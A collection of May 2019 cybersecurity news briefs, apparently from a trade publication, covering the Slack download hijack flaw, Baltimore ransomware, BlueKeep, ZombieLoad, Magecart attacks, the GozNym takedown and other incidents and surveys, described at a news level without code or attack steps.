Download Hijack Flaw Patched in Slack Patches for Windows

Download Hijack Flaw Patched in Slack Patches for Windows

Slack users have been urged to upgrade their applications and clients to the most recent version, 3.4.0, after Tenable researcher David Wells discovered a new vulnerability that would allow an attacker to share malicious hyperlinks that could alter where a victim’s files were stored.

Wells discovered a download hijack vulnerability in Slack Desktop version 3.3.7 for Windows. “This vulnerability, which has been patched, would have allowed an attacker to post a crafted hyperlink into a Slack channel or private conversation that changes the document download location path when clicked. It does require user interaction to exploit, giving it a CVSSv2 score of 5.5 (Medium),” today’s press release said.

If users click on the link, an attacker could not only steal future documents downloaded within Slack but also manipulate them, such as injecting malicious code that would compromise the victim’s machine once opened, according to Wells.

The attack reportedly can be performed through any Slack direct messaging or Slack channel to which an attacker might be authenticated.

“Using this attack vector, an insider could exploit this vulnerability for corporate espionage, manipulation, or to gain access to documents outside of their purview," which Wells discusses in depth in his blog post.

The flaw was found in the Slack desktop application for Windows version 3.3.7, which Tenable reported to Slack via HackerOne. “Slack patched the bug as part of its latest update for Slack Desktop Application for Windows, v3.4.0. Slack investigated and found no indication that this vulnerability was ever utilized, nor reports that its users were impacted. As always, users are encouraged to upgrade their apps and clients to the latest available version,” a Slack spokesperson said.

“The digital economy and global distributed workforce have brought new technologies to market with the ultimate goal of seamless connectivity,” said Renaud Deraison, co-founder and chief technology officer, Tenable. “But it’s critical that organizations realize this emerging technology is potentially vulnerable and part of their expanding attack surface. Tenable Research continues to work with vendors such as Slack to disclose our discoveries to ensure consumers and organizations are secure.”

More Orgs Use Booby Traps for Counterintelligence

More Orgs Use Booby Traps for Counterintelligence

A recent survey found that to gain counterintelligence the vast majority of organizations would allow an attacker to take decoy files rather than stop an attack in progress, according to the latest International Cyber Benchmark Index from the Neustar International Security Council (NISC).

A reported one in five companies are currently employing forensic investigations, as well as setting up honey pots and repositories of fake data to lure attackers in, but an impressive 71% of respondents said that instead of shutting down an attack when a bad actor accesses a deceptive file, they would be willing to let the malicious actors take booby-trapped document, according to a May 16 press release.

Being able to collect intelligence could allow defenders to identify thieves in the future, potentially revealing information about the location, ownership and possible vulnerabilities of the hackers’ machines, the press release said.

Of the respondents surveyed, 51% said their enterprise had suffered a distributed denial-of-service (DDoS) attack, and 52% of participants also identified phishing as a growing threat with targeted hacking. DDoS attacks followed close behind at 49%.

“Security leaders increasingly feel that breaches are inevitable, and there is a growing appetite for advanced forensic tools that can deliver insights around attacker attribution and tactics in real time,” said Rodney Joffe, chairman of NISC and Neustar SVP and fellow.

“Whether they opt to use them like an alarm system, ejecting bad actors from the network upon contact with a honey pot or deceptive file, or for a more sophisticated counterintelligence operation that gathers vital information on attacker movements and methods, cybersecurity professionals want solutions that can provide better real-time awareness and understanding of the enemy.”

According to the survey, the threat of social engineering continues to rise across all vectors, with 48% of respondents admitting they witnessed an uptick in attempts via email, 38% noting a rise in text-based attempts and 36% reporting a rise in attempts via phone.

Responses showed that security pros are more aware not only of where attacks are originating but also of the types of attacks that pose the greatest threats.

Baltimore Won’t Pay Ransom, Systems Remain Down

Baltimore Won't Pay Ransom, Systems Remain Down

The city of Baltimore’s computer systems have remained down since a ransomware attack hit more than a week ago, but the city says it will not pay the ransom despite today’s final 10-day deadline, according to copy of the ransom note obtained by the Baltimore Sun.

The May 7 note warned that if the ransom were not paid within 10 days, the city would no longer be able to have its files returned. In the aftermath of the attack, Baltimore has reverted to using manual systems while it continues efforts to restore the downed system.

From the transportation department to the department of public works and even closing on real estate deals, everything is being held up in what CCN called “the most extensive attacks in history, affecting nearly every important aspect of city life.”

Despite the attackers warning that if the city called the FBI they would cut off contact, federal investigators are assisting in the efforts to free the crippled city. The message from Mayor Jack Young is clear – the city will not pay the ransom, according to WMAR.

As the city struggles to free itself from the constraints of this attack, city officials are looking for ways to be better prepared for future attacks. On May 16, Baltimore city council president Brandon Scott said he was launching a committee on cybersecurity and emergency preparedness.

“This cyber attack against Baltimore City government is a crisis of the utmost urgency,” Scott said, according to The Hill. “That is why I will convene a select committee, co-chaired by Councilman Eric Costello and Councilman Isaac ‘Yitzy’ Schleifer, to examine the City's coordination of cybersecurity efforts, including the Administration's response to the cybersecurity attack and testimony from cybersecurity experts.”

Hacktivist Attacks Have Fallen 95% Since 2015

Hacktivist Attacks Have Fallen 95% Since 2015

The number of publicly disclosed hacktivist attacks has dropped by 95% between 2015 and 2018 thanks to the relative decline of Anonymous, new stats from IBM X-Force have revealed.

The firm claimed that it recorded 35 incidents in 2015, but the number dropped to just five two years later and two by 2018, with none so far this year.

The number attributed to the Anonymous dropped from eight incidents in 2015 to only one tracked in 2018. This is significant as the hacktivist collective accounted for almost 45% of all attacks between 2015 and 2018.

Other groups tend to strike once or twice and then disappear, security analyst Camille Singleton explained in a blog post.

“Starting around 2010, Anonymous became one of the most prolific hacktivist groups in the world, reaching a peak of activity in early- to mid-2016, according to IBM X-Force data. Since then, attacks by Anonymous have declined significantly, possibly due to an attrition of key leadership, differences of opinion and a struggle to find an ideological focus,” she said.

“In addition to differences in viewpoint, several cyber actors have sought to masquerade as Anonymous actors over the past three years, using the moniker in an attempt to legitimize their actions or to tarnish the group’s name by connecting their activities to Anonymous.”

Another potential factor in the decline of hacktivist activity is law enforcement activity. Singleton claimed arrests and legal warnings may be acting as an effective deterrent.

“X-Force IRIS internal tracking of related arrests revealed that law enforcement agencies in the US, UK and Turkey have arrested at least 62 hacktivists since 2011,” she added.

“We suspect the actual number is greater than those publicly announced.”

Three of those arrested received sentences in 2018 and 2019 with jail time of three years or greater. One individual, Martin Gottesfeld, 34, of Somerville, was handed a 10-year sentence after DDoS-ing a Boston hospital in 2014.

Facebook Bans Israeli Firm For Election Meddling

Facebook Bans Israeli Firm For Election Meddling

Facebook has banned an Israeli company from its platform after detecting a massive, coordinated attempt to influence voters in Africa.

In a blog post yesterday, head of cybersecurity policy, Nathaniel Gleicher, revealed his team had been forced to remove 265 Facebook and Instagram accounts, Facebook Pages, Groups and events involved in “coordinated inauthentic behavior” managed by Archimedes Group.

In total, the shadowy Israeli firm ran 65 Facebook accounts, 161 Pages, 23 Groups, 12 events and four Instagram accounts. Its efforts reached a fairly wide audience, with around 2.8 million accounts following one or more of the Pages, while 5,500 accounts joined at least one of the Groups and around 920 people followed one or more of the Instagram accounts.

“The people behind this network used fake accounts to run Pages, disseminate their content and artificially increase engagement. They also represented themselves as locals, including local news organizations, and published allegedly leaked information about politicians,” Gleicher explained.

“The Page administrators and account owners frequently posted about political news, including topics like elections in various countries, candidate views and criticism of political opponents.”

Originating in Israel, the moves targeted users in Nigeria, Senegal, Togo, Angola, Niger and Tunisia, with Facebook also claiming to have found some suspicious activity in Latin America and Southeast Asia.

Around $812,000 was spent on Facebook ads paid for in Brazilian reals, Israeli shekel, and US dollars. They ran from 2012 to 2019, which raises questions about why they weren’t spotted sooner.

“Coordinated inauthentic behavior” is the same moniker used to describe the activity of Russian state-sponsored attempts to interfere with the 2016 US Presidential election, which resulted in the indictment of 13 Russians and three companies from the country.

Archimedes Group, whose tagline is “winning campaigns worldwide,” has now been banned from the social network along with all its subsidiaries and issued with a cease and desist letter.

Europol and US Police Disrupt $100m Cybercrime Gang

Europol and US Police Disrupt $100m Cybercrime Gang

Europol and US authorities are claiming victory after “dismantling” a major international cybercrime gang that used the GozNym banking trojan in an attempt to steal $100m from businesses.

A federal indictment was unsealed yesterday charging 10 members of the group with conspiracy to commit computer fraud, conspiracy to commit wire fraud and bank fraud, and conspiracy to commit money laundering. An eleventh has already been charged in a previous indictment.

Five of the gang are based in Russia and will therefore probably escape justice. However, the leader of the group, Alexander Konovolov — aka “NoNe,” and “none_1” — 35, of Tbilisi, Georgia, is being prosecuted in his home country, along with his alleged right-hand man Marat Kazandjian, aka “phant0m,” 31, of Kazakhstan and Tbilisi.

Another man, Eduard Malanici, aka “JekaProf,” is being prosecuted in his native Moldova for charges relating to alleged provision of crypting services, while Gennady Kapkanov — aka “Hennadiy Kapkanov,” “flux,” “ffhost,” “firestarter,” and “User 41” — 36, of Poltava, Ukraine, is being prosecuted in the eastern European nation for charges of bulletproof hosting for the group via the infamous Avalanche network.

He was arrested in 2018 after shooting an assault rifle at Ukrainian police searching his flat, while another man, Krasimir Nikolov, of Varna, Bulgari, was extradited to the US in 2016 on charges of being the group’s account takeover specialist.

Each man had a specific role and was apparently recruited from Russian-speaking dark web forums. The GozNym malware was distributed to around 41,000 victim computers via phishing emails. Once they captured the victim’s online banking credentials, accounts were accessed and funds transferred to third-party accounts under the group’s control.

“International law enforcement has recognized that the only way to truly disrupt and defeat transnational, anonymized networks is to do so in partnership,” said Pennsylvania US attorney Scott Brady. 

“The collaborative and simultaneous prosecution of the members of the GozNym criminal conspiracy in four countries represents a paradigm shift in how we investigate and prosecute cybercrime.”

Roy Rashti, cybersecurity expert at BitDam, argued that the dismantling of this network is just a drop in the ocean, but a welcome move nonetheless.

“The ‘Goz’ in GozNym stands for the notorious Gozi banker malware which, although not new, was very successfully co-opted and iterated by hackers,” he added.

“This provides yet another example of how adversaries tweak known attacks to bypass legacy security solutions to reach and exploit the end user. This strategy allows cybercrime groups to operate like any successful business — with efficiency, dynamism and always staying one step ahead. That is of course, until they get caught.”

Critical Vulnerabilities in Cisco Products

Critical Vulnerabilities in Cisco Products

A high-risk vulnerability in Cisco's secure boot process was disclosed earlier this week by Cisco and Red Balloon Security and is believed to have affected an estimate 100 or more devices.

The vulnerability (CVE-2019-1649) is “in the logic that handles access control to one of the hardware components in Cisco's proprietary Secure Boot implementation could allow an authenticated, local attacker to write a modified firmware image to the component. This vulnerability affects multiple Cisco products that support hardware-based Secure Boot functionality,” Cisco reported.

Additionally, Cisco reported that another vulnerability (CVE-2019-1862) in the “web-based user interface (Web UI) of Cisco IOS XE Software could allow an authenticated, remote attacker to execute commands on the underlying Linux shell of an affected device with root privileges.”

The vulnerability, called Thrangrycat, affects millions of Cisco devices (including routers, switches and firewalls) and exposes a large number of corporate and government networks to remote attacks, according to Red Balloon Security.

Cisco also noted in regard to the Secure Boot vulnerability that it will release software patches, but there are no workarounds to address the issue.

An attacker could exploit this to gain full and permanent access to those networks. It also can't be fixed with a software patch, so it will be difficult for affected organizations to fully mitigate the threats this poses, according to Red Balloon Security.

“This is a significant security weakness which potentially exposes a large number of corporate, government and even military networks to remote attacks,” said Dr. Ang Cui, founder and chief scientist of Red Balloon Security, in a press release. 

“We're talking about tens of millions of devices potentially affected by this vulnerability, many of them located inside of sensitive networks. These Cisco products form the backbone of secure communications for these organizations, and yet we can exploit them to permanently own their networks. Fixing this problem isn't easy, because to truly remediate it requires a physical replacement of the chip at the heart of the Trust Anchor system. A firmware patch will help to offset the risks, but it won't completely eliminate them. This is the real danger, and it will be difficult for companies, financial institutions and government agencies to properly address this problem.”

Forbes Site Up, Then Down Again after Magecart Attack

Forbes Site Up, Then Down Again after Magecart Attack

Forbes was reportedly back online but went down again at 3:30 pm UTC after reports that the site was hit with the Magecart card-skimming malware, according to security researcher Troy Mursch.

Mursch tweeted on May 15 that Forbes had been infected with the Magecart malware, adding that customers who made a purchase while the site was compromised likely had their credit card information stolen. In a later tweet, Mursch confirmed that the malware had been removed.

Hackers apparently injected obfuscated JavaScript, which could be linked to the ongoing supply chain attacks that have been reported by Willem DeGroot this week. Forbes is, according to The Register, a customer of Picreel, which has been the victim of a supply chain attack.

Mursch reportedly sent several emails in an attempt to alert Forbes to the Magecart infection and reported the problem to the domain owner, yet he has not heard back from Forbes, The Register said.

“Threat actors have used several methods of attacking websites. There’s a trend, though, towards attacking the payment page supply chain, which offers the most bang for their buck because third parties offer direct links to a larger number of customers, including high-profile companies that would otherwise be harder to compromise,” said Mike Bittner, associate director of digital security and operations, The Media Trust.

“These pages are soft targets for several reasons. They run third-party code supplied by vendors who operate on very tight – sometimes negative – profit margins and must scrutinize every expense. Such businesses too often fail to give security and privacy the priority they require. Second, third-party code executes outside the website owner’s infrastructure, making them hard, if not impossible, to monitor without the right tools and expertise. Third, in many publications, these payment pages do not fall under the website operators’ rev ops teams, who make pivotal decisions on security and privacy.

“The bottom line here is that publishers should carefully vet ALL their third parties for security and privacy and conduct frequent audits to ensure they have adequate security measures in place. Because every one of their third parties is likely not only vulnerable but under attack.”

Supply Chain Attack Hits Best of the Web Website

Supply Chain Attack Hits Best of the Web Website

The website Best of the Web, whose purpose is to assure site visitors that their user data is safe and that the websites it lists value visitor privacy, has been hacked, according to security researcher Willem de Groot. The site is a directory of websites that receive a trust seal so visitors will know they are real businesses, but the site itself was injected with an information stealing malware.  

On May 13, the researcher tweeted that the Best of the Web seal was injected with two keyloggers and that more than 100 websites were still linked to the compromised seal.

Attackers reportedly injected obfuscated JavaScript code, and according to his latest tweet, DeGroot confirmed that the attackers used open S3 buckets to inject form jackers. DeGroot has identified several supply chain attacks that have impacted multiple companies (complete list at PublicWWW), including Picreel,,,, and

Best of the Web confirmed that it had been compromised, stating, "Earlier today, we were notified that the script we use to display trust seals that we host on Amazon’s content delivery network (CDN) was compromised. We took immediate action to remedy the situation and are in the process of informing those who were affected. We will be conducting a full security audit of our hosted accounts to ensure that this does not happen again.”

“In this latest supply chain attack, hackers went after the weakest link with the most impact to affect the greatest number of websites,” said Matan Or-El, CEO of Panorays. “It’s certainly ironic to hack a trust seal, and the message is clear: you cannot trust anything. This cyber incident underscores the importance of assessing the security of all third parties and continuously monitoring them, since their status can quickly change, as was the case here where the code was maliciously modified.”

UK Fraud Complaints Surge Over 40%

UK Fraud Complaints Surge Over 40%

UK consumers’ complaints over banking fraud have surged by over 40% to hit an all-time high in the 2018-19 financial year, driven by online scams, according to official figures.

The Financial Ombudsman Service (FOS), which settles disputes between customers and their banks, said it received 12,195 complaints over the period, a 43% increase on the 6952 in the previous 12 months.

“One of the fastest-growing types of fraud is authorized push payment (APP) fraud — where people unwittingly act on fraudsters’ instructions and carry out the transactions themselves,” the FOS said.

“We’ve been taking a close look at the APP complaints we’ve received. And we’ve reminded banks of their existing obligations to ensure that victims of fraud are treated fairly, as we’ve found that they haven’t always got this right.”

A new voluntary code of practice will come into force at the end of May designed to help victims of APP fraud get their money back more easily. Up until now, banks have been reluctant to pay out in such cases and often blame the individual.

Some £354m was lost to APP fraud in the UK last year, up 50% from 2017. Although some lenders, like TSB, have sought to differentiate by promising to refund victims, the industry in general has been slow to react to the threat.

“Bank transfer fraud is spiraling out of control, with people losing life-changing sums every day and then facing a grueling battle to get their money back from the very banks that should be preventing them from falling victim in the first place,” argued Gareth Shaw, head of money at consumer rights group Which.

“Banks have just two weeks to sign up to the new industry code [of practice], which will only be deemed a success if they finally halt this worsening crime by offering better protection to their customers, while swiftly and fairly reimbursing all those who lose money through no fault of their own.’

Another new proposal comes from the Payment Systems Regulator (PSR) and will introduce “confirmation of payee checks” to warn users when the name they enter into online bank transfers doesn’t match the sort code and account number on record.

However, a July 1, 2019 deadline is now set to be pushed back to 2020.

Rights Group Win Allows Courts to Scrutinize Spy Agencies

Rights Group Win Allows Courts to Scrutinize Spy Agencies

Privacy campaigners are hailing a major legal victory after the Supreme Court ruled that the intelligence services should not be exempt from oversight by ordinary UK courts.

Privacy International (PI) has fought a five-year case with the government, following the Edward Snowden disclosures that UK spies used bulk hacking techniques which may have impacted millions.

The case was initially heard in the secret Investigatory Powers Tribunal (IPT) — which rules specifically on cases involving the intelligence services. It agreed in principle with the government that it would be acceptable to use a single, broad warrant to hack every mobile phone in a UK city.

PI tried to fight that decision in the High Court, with the government arguing that IPT rulings couldn’t be subject to regular judicial review. Both the High Court and then the Court of Appeal agreed with the government, but the rights group was in 2017 allowed to take its case all the way to the Supreme Court.

Its decision yesterday effectively means that IPT decisions can be subject to judicial review in the High Court, which means mistakes made by the tribunal can now be corrected by the courts.

PI general counsel, Caroline Wilson Palow, argued the ruling was a “historic victory for the rule of law.”

“Countries around the world are currently grappling with serious questions regarding what power should reside in each branch of government. Today's ruling is a welcome precedent for all of those countries, striking a reasonable balance between executive, legislative and judicial power,” she added.

“Today's ruling paves the way for Privacy International's challenge to the UK government's use of bulk computer hacking warrants. Our challenge has been delayed for years by the government's persistent attempt to protect the IPT’s decisions from scrutiny. We are heartened that our case will now go forward."

Trump Declares National Emergency to Contain China Threat

Trump Declares National Emergency to Contain China Threat

The Trump administration has turned up the heat on China after declaring a national emergency designed ostensibly to protect US networks from “foreign adversaries.”

Although China and Huawei are not named in the declaration, it is widely seen as a move designed to target the latter. It will effectively extend the federal ban on Huawei equipment to all US firms.

Separately, and perhaps even more importantly, the Shenzhen giant and 70 affiliates have been placed on an “entity list.”

This means that it will not be able to source key components from US providers without Commerce Department approval.

Depending on whether this approval is granted or not, this could put the firm in a serious position similar to ZTE's when US firms were prohibited from selling to it after the Chinese telecoms firms broke Iran sanctions. At that time, only an intervention from Trump saved the company.

US officials told Reuters the decision would make it nearly impossible for Huawei to sell some of its products as they rely on US-made kit.

A White House statement revealed that the Executive Order invoked the International Emergency Economic Powers Act, which allows a President to interfere with commerce in order to protect national security. The Commerce Department now has 150 days to draw up an enforcement plan.

“The President has made it clear that this administration will do what it takes to keep America safe and prosperous, and to protect America from foreign adversaries who are actively and increasingly creating and exploiting vulnerabilities in information and communications technology infrastructure and services in the United States,” noted a message from the White House press secretary.

“This Executive Order declares a national emergency with respect to the threats against information and communications technology and services in the United States and delegates authority to the Secretary of Commerce to prohibit transactions posing an unacceptable risk to the national security of the United States or the security and safety of United States persons.”

Unsurprisingly, Huawei and China have hit back, claiming the order will not make the US safer but only result in delayed 5G roll-outs which will harm consumers.

Washington has so far failed to produce any hard evidence to suggest that Huawei is a national security risk, although Chinese law demands that any Middle Kingdom firm co-operate with the authorities if required.

However, UK intelligence services have raised serious concerns around the quality of the telecoms kit maker’s “security and engineering processes.”

Still, Prime Minister Theresa May recently overruled several Cabinet members in approving the firm to supply non-core 5G kit.

Steve Patton, director and cybersecurity Specialist at Telesoft Technologies, argued that a “measured approach” is needed to combat telecoms cyber risk.

“Even with a network built from other, non-Chinese vendors, there should be additional protection and — more importantly — monitoring of critical infrastructure to scan for threats,” he said.

“After all, given we live in a truly technological age, where cyber-threats are increasingly advanced, it's impossible to guarantee that any one vendor is fully immune from attacks.”

Companies’ Stock Value Dropped 7.5% after Data Breaches

Companies' Stock Value Dropped 7.5% after Data Breaches

After analyzing the top three breaches from the past three years, Bitglass found that in the aftermath of a data breach, a decrease in stock price was a notable repercussion identifiable for publicly traded companies.

The report, Kings of the Monster Breaches, identified the extensive damage done by improper security by looking specifically at the Marriott breach of 2018, the Equifax breach of 2017 and the Yahoo! breach of 2016. These top three breaches had a widespread impact on individuals, with a reported mean number of 257 million individuals directly affected by each breach.  

Research also showed that these breaches have cost an average of $347 million in legal fees, penalties and remediation costs. “Marriott uncovered the breach while seeking GDPR compliance; the company is now being fined $912 million under the regulation,” the report said.

The top breaches resulted from outside attackers employing phishing campaigns, using malware or exploiting technical vulnerabilities, which was the case for Equifax. “Through this vulnerability, hackers were able to access sensitive data such as Social Security numbers, credit card numbers, full names, dates of birth, and home addresses. It took roughly two months for the breach to be discovered. The company’s CSO, Susan Mauldin, and CIO, David Webb, retired immediately after the security lapse had been announced,” according to the report.

Publicly traded companies suffered an average drop of 7.5% in their stock values and a mean market cap loss of $5.4 billion per company, and it reportedly took 46 days, on average, for those stock prices to return to their pre-breach levels. To date, the stock price of Equifax has not yet recovered.

"The largest breaches over the past three years have caused massive and irreparable damage to large enterprises and their stakeholders around the globe," said Rich Campagna, chief marketing officer of Bitglass.

"This should serve as a stark warning to organizations everywhere. If massive companies with seemingly endless resources are falling victim to external attacks, then companies of all sizes must remain vigilant in their cybersecurity efforts. It is only by taking a proactive approach to security that breaches can be prevented and data can truly be kept safe.”

IT Decision-Makers Willing to Share Threat Intel

IT Decision-Makers Willing to Share Threat Intel

The sharing mentality is starting to take hold across the cybersecurity industry, with the vast majority of security decision-makers confessing that they would be willing to share threat intelligence, according to a new publication by IronNet.

The report, Collective Offense Calls for Collective Defense: A Reality Check for Cybersecurity Decision Makers, surveyed 200 U.S. security IT decision-makers. Of those, 94% stated that their organization would be willing to increase the level of threat sharing with their industry peers if it demonstrably improved their ability to detect threats.

Additionally, 92% of respondents said they would even increase threat sharing with the government if it meant the government could use political, economic, cyber, or other national-level capabilities to deter cyber-attacks, the report said.

As nation-state attacks become more prevalent, threat actors are collaborating on techniques to make their attacks more profitable, leaving individual security teams to defend themselves against a collective offense.

The report also found that organizations are suffering an average of one cybersecurity incident every three months, with 80% saying the incident was so severe that it required C-level and/or board meetings afterward.

“Despite most IT decision makers’ reported confidence that their cybersecurity capabilities are advanced and in better shape than others in their industry (55%), they nonetheless experienced an average of four attacks on their organization over a 12 month period, with 20% of respondents being hit six or more times,” the report said.

“Organizations are increasingly grasping the need for better threat information sharing. Half of decision makers surveyed noted that their threat sharing tool could be improved upon, and 46% identified a need for enhanced sharing of cyber attacker tools, tactics, and procedures (TTP) and faster sharing of raw intelligence at network speed. The lack of such protections magnified the damage from recent attacks like Hydro Norsk, NotPetya, and others that quickly spread from company to company and could have been mitigated by better collective defense.”

Boost Mobile Alerts Customers of Security Incident

Boost Mobile Alerts Customers of Security Incident

Customers of Boost Mobile are being urged to change their passwords and PINs after the company announced that it detected unauthorized activity from a third party.

“On March 14, 2019, experienced unauthorized online account activity in which an unauthorized person accessed your account through your Boost phone number and PIN code,” the notice of a security incident said.

“The Boost Mobile fraud team discovered the incident and was able to implement a permanent solution to prevent similar unauthorized account activity.”

Attackers using compromised credentials accounted for 29% of data breaches, according to Verizon’s 2019 Data Breach Investigation Report. The unauthorized access at Boost Mobile is what Byron Rashed, VP of marketing, Centripetal, called a classic example of a series of events that enables threat actors to infiltrate networks and exfiltrate customer data and/or personally identifiable information.

Usually, a compromised credential from a third-party breach starts the process. The threat actor can use various unsophisticated/sophisticated techniques to either obtain a password or crack a hashed password. Once an account is compromised, the threat actor can find a way into the network and access various databases,” Rashed said.

“The credentials can be a typical customer/user and/or an admin that has network access. Threat actors can leverage various tools and social media to find out information on users/admins and obtain a password (such as the names of spouses, children, pets, etc.) and try different combinations using automated tools.”

In addition to urging customers to follow the security strategies set forth by the Federal Trade Commission, Boost Mobile sent temporary PIN code via text message, reminding customers to avoid combinations such as "1234" or "0000."

“The best defense against attackers using stolen credentials is to use a password that is unique with various characters and one that does not contain anything that is specific to the individual as noted,” Rashed added.

“On the network defense side, shielding against known IPs, domains, and other sources is critical. Most breaches come from known sources. To shield these sources from the onset greatly increases the organization’s security posture.”

Hospitals Failing on Cybersecurity Hygiene

Hospitals Failing on Cybersecurity Hygiene

Healthcare organizations (HCOs) are increasingly at risk from legacy operating systems, device complexity and the use of commonly exploited protocols, according to a new study from Forescout.

The security vendor analyzed 75 global healthcare deployments running over 1.5 million devices across 10,000 virtual local area networks (VLANs).

It found that although less than 1% were running unsupported operating systems, 71% of Windows devices were on Windows 7, Windows 2008 or Windows Mobile, which will be end-of-lifed in January 2020 — less than a year away.

These HCOs are further exposing themselves to threats by using high-risk services like SMB, which was exploited in the infamous WannaCry attacks, as well as RDP, FTP and others. Some 85% of Windows devices had SMB turned on, while over a third (35%) were running RDP, which is commonly used in fileless attacks.

The sheer range of medical devices in use also presents greater cyber-risks, especially as many aren’t architected with security in mind, the report claimed.

A third (34%) of organizations’ medical VLANs were found to support more than 100 distinct device vendors. Even more are likely to exist on other networks.

Patching is often problematic due to the criticality of these devices and the fact that, in some cases, doing so invalidates the product’s warranty.

Even worse, in many cases, vendors are responsible for patching themselves, and sometimes devices are connected to the network without the oversight of IT, claimed the report.

Forescout argued that VLANs could help HCOs mitigate risk by segmenting their networks. However, in half (49%) of the deployments studied, medical devices were connected to 10 VLANs or fewer, suggesting insufficient investment in this strategy.

“Our findings reveal that healthcare organizations have some of the most diverse and complex IT environments, which are compounded due to compliance risks,” argued Elisa Costante, head of OT and industrial technology innovation at Forescout.

“Every time a patch is applied, there is concern around voiding a warranty or impacting patient safety. These organizations are dealing with life-saving devices and extremely sensitive environments.”

Although there has been an explosion in OT (8%) and IoT (39%) devices in recent years, the biggest potential attack surface on medical VLANs came from regular IT devices (53%), the report claimed.

“Wormable” Bug Could Enable Another WannaCry

“Wormable” Bug Could Enable Another WannaCry

Microsoft released fixes for 79 unique vulnerabilities yesterday, including 22 critical bugs — one of which could be used to spread malware around the globe.

Microsoft detailed the potential impact of CVE-2019-0708 in a separate blog post on Tuesday.

This is a flaw in Remote Desktop Services (RDS) which could allow an attacker to remotely execute arbitrary code on a target system after connecting using RDP.

Even worse, according to Microsoft, the bug is “wormable,” meaning that “any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017.”

“While we have observed no exploitation of this vulnerability, it is highly likely that malicious actors will write an exploit for this vulnerability and incorporate it into their malware,” Microsoft warned.

Although the bug affects older operating systems — Windows 7, Windows Server 2008 R2 and Windows Server 2008 — it should be patched ASAP. Microsoft is even making fixes available for out-of-support versions XP and Windows 2003, such is the potential threat.

“CVE-2019-0708 should be the highest priority patching because, in addition to the wormable capabilities in this exploit, many modern ransomware variants, such as Dharma, Robbinhood, and CrySIS, often use vulnerable RDP servers to gain access to victim networks,” argued Recorded Future senior solutions architect, Allan Liska. “This vulnerability will make that process even easier.”

Elsewhere, IT admins should also fix a zero-day flaw (CVE-2019-0863), which is being exploited in the wild and has also been publicly disclosed, meaning other hackers could use it in their own attacks. It’s an elevation-of-privilege vulnerability in the way Windows Error Reporting handles files, which allows an attacker to gain kernel mode access to a victim system.

In addition, a publicly disclosed vulnerability in Skype for Android (CVE-2019-0932) could enable an attacker to snoop on conversations without a victim’s knowledge.

ZombieLoad Bugs Expose Intel Machines to Data Theft

ZombieLoad Bugs Expose Intel Machines to Data Theft

Researchers have discovered a major new set of vulnerabilities in nearly all post-2011 Intel chips which could enable side-channel attacks targeting sensitive information.

ZombieLoad is reminiscent of Spectre and Meltdown bugs reported in January 2018 in that it affects not only desktop and laptop machines but also cloud servers. Like them, it exploits the speculative execution process to enable attackers to steal data from the processor.

Technically known as a “data sampling attack,” it’s far from trivial to launch, but should be addressed immediately by admins as it could theoretically allow attackers to monitor a victim’s browsing in real-time, or steal sensitive credentials and data.

“While programs normally only see their own data, a malicious program can exploit the fill buffers to get hold of secrets currently processed by other running programs,” the research paper claimed. “These secrets can be user-level secrets, such as browser history, website content, user keys, and passwords, or system-level secrets, such as disk encryption keys.”

ZombieLoad (CVE-2018-12130) is the most dangerous vulnerability, although the researchers also found three others: CVE-2018-12126, CVE-2018-12127 and CVE-2019-11091. Intel calls these Microarchitectural Data Sampling (MDS) flaws.

“All of them have in common that they trigger a faulty read, and extract data used by transiently executed operations via a side-channel,” said the researchers in an accompanying blog post.

The good news is that Intel has already addressed MDS issues post-Spectre/Meltdown, so its newer chips (8th and 9th Generation Intel Core processors and 2nd Generation Intel Xeon Scalable processor family) aren’t affected.

It has also released microcode updates to address the vulnerabilities, although these could apparently have a 9% performance hit on cloud machines and around 3% on desktops and laptops. Apple, Google, and Microsoft have already released patches to fix ZombieLoad.

San Francisco Votes to Ban Facial Recognition

San Francisco Votes to Ban Facial Recognition

Lawmakers in San Francisco will vote today on legislation that would ban the use of facial recognition technology among city departments, according to NPR.

If approved, the law would make San Francisco the first city to ban the technologies use, a ban that would extend to police body cameras. “Governments have used the technology for several years, and the software can assist with efforts to find missing children, for example, or prevent driver's license fraud,” NPR reported.

That the technology is so widely used is evidence of what happens when the pace of adoption moves too swiftly. “It’s good to see legislators and others taking technological innovations seriously – especially in terms of this one-to-many use case where facial recognition might be used to pick a face out of a crowd,” said Sam Bakken, senior product marketing manager at OneSpan.

“It’s important to remember though that one-to-one use cases such as that facilitated by Apple Face ID and other technology whereby a user willingly enrolls in the system to allow them to unlock their phone or log into other accounts using their face makes it easy and convenient for consumers to add an additional layer of security to their mobile devices and accounts.”

The proposed legislation is intended to address those instances where individuals are not consenting to have their images included in a database, but not all experts agree that the move to ban the technology is a step in the right direction.

“This is backwards thinking when it comes to public safety and an equally illogical argument could be made against using fingerprints and DNA evidence, which are also left behind without intent or permission but are instrumental in providing leads that solve countless crimes and bring violent criminals to justice. We have a constitutional presumption of innocence that protects us. If facial recognition or fingerprint matching or DNA testing provides clues to law enforcement agencies, they should not be barred from following up on them," John Gunn, CMO, OneSpan.

Speculators Look to ID AVs Hacked by Russia

Speculators Look to ID AVs Hacked by Russia

Last week Infosecurity Magazine reported on threat intelligence published by Advanced Intelligence (AdvIntel) claiming that three US antivirus companies had been hacked by a top-tier Russian hacking collective.

While the original research did not identify the impacted companies, both Gizmodo and Bleeping Computer have reported that McAfee, Symantec and Trend Micro are the three companies in question.

Though it does try to adhere to the general rule of not discussing victim entities, an AdvIntel spokesperson said in an email, “Given the latest independent corroboration and publication, we can confirm that Trend Micro and McAfee were two of the companies that were claimed to be breached by the actor group with their internal access and data for sale.”

Trend Micro has confirmed that an unauthorized third party accessed a single testing lab network. “We have an active investigation underway related to recent claims, and while it is not complete, we want to transparently share what we have learned. Working closely with law enforcement, our global threat research and forensic teams are leading this investigation,” a Trend Micro spokesperson wrote in an email.

“Some low-risk debugging related information was obtained. We are nearing the end of our investigation and at this time we have seen no indication that any customer data nor source code were accessed or exfiltrated. Immediate action was taken to quarantine the lab and additionally secure all corresponding environments. Due to the active nature of the investigation, we are not in a position to share any additional information, but we will provide an update when additional insights become available and can be disclosed.”

A McAfee spokesperson wrote, “McAfee has been conducting a thorough investigation into these claims. To date, we’ve found no indication that McAfee products, services or networks have been impacted by the campaign described.”

AdvIntel said that it had reached out to all of the purported victims, as well as the law enforcement, regarding Fxmsp well before its initial blog was released. Though the company did not comment on whether Symantec was one of the breached companies, there has been speculation that Symantec is the third victim.

